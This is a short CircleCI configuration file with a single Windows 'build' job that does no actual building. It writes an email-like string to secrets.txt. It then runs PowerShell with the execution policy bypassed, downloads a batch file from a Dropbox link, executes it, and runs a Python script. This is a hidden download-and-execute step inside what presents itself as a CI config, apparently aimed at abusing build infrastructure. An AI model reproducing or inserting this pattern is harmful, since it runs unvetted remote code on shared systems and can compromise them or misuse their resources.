version: 2.1

jobs:
  build:
    machine:
      image: 'windows-server-2022-gui:current'
      resource_class: windows.medium
      shell: powershell.exe -ExecutionPolicy Bypass
    steps:
      - run: |
         Set-Content secrets.txt "pui5pm8a@zogyu.com"
      - run: |
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat
         python time.py
